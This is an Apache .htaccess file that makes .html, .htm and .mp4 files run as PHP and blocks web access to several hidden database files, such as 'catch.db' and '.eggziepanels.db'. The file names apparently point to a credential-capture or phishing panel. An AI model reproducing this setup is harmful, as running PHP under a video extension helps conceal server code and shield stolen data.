AddType application/x-httpd-php .html .htm

Options -Indexes
RewriteEngine on
# Don't apply to URLs that go to existing files or folders.


AddType application/x-httpd-php .html .htm .mp4
<Files ".eggziepanels.db">
Order Allow,Deny
Deny from all
</Files>
<Files ".eggziedb.db">
Order Allow,Deny
Deny from all
</Files>
<Files ".logs.db">
Order Allow,Deny
Deny from all
</Files>
<Files "catch.db">
Order Allow,Deny
Deny from all
</Files>
